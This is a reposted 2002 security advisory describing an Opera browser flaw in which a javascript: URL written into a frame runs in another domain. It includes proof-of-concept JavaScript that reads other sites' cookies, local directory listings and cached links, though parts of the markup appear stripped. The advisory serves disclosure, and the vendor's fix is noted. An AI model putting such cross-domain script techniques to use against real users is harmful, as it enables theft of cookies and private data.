Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » Opera javascript protocoll vulnerability

Opera javascript protocoll vulnerability

by Nikola Strahija on May 15th, 2002 Opera allows the location of a frame to be overwritten by an url containing the javascript protocoll. The javascript code will be operating in the same domain as the url that was overwritten. Thus we can read cookies from other domains, local file structure and private information from the cache (history of links visited).


EXPLOIT I:
==========
The following exploit has been tested to work on Opera 6.01, 6.0 (win). It
will not work on 5.x because it requires the iframe feature.

------------------- CUT HERE -----------------------------------



Read google cookie
Read c:/ structure (win)
Read links in cache

function readCookie(){
cookie.location="javascript:alert(document.cookie)";
}
function readFiles(){
t = 'javascript:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
files.location = t;
}
function readCache(){
t = 'javascript:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
cache.location = t;
}

------------------- CUT HERE -----------------------------------


EXPLOIT II:
===========
For versions of Opera not supporting the iframe tag the exploit must be
done using the frame tag instead. The following exploit has been tested on
Opera 6.01, 6.0, 5.12 (win).

------------------- CUT HERE -----------------------------------








------------------- CUT HERE -----------------------------------
payload.html:
------------------- CUT HERE -----------------------------------
Google
cookie

First
item in cache

First
file/directory in c: (win)

------------------- CUT HERE -----------------------------------


Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


Old advisories:
===============
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561


Feedback:
=========
Please send suggestions and comments to: _ _
[email protected] o' ,=./ `o
(o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---
Andreas Sandblad,
student in Engineering Physics at the University of Umea, Sweden.
-/---/---/---/---/---/---/---/---/---/---/---/---/---/---/---/--


Date: [2002-05-15]
Software: At least Opera 6.01, 6.0, 5.12 (win)
Rating: High because Opera is assumed to be secure
Impact: Read cookies/local filestructure/cache
Vendor: Opera has confirmed the vulnerability and released
today a new version 6.02 fixing the issue.
http://www.opera.com/ _ _
Workaround: Disable javascript. o' ,=./ `o
Author: Andreas Sandblad, [email protected] (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »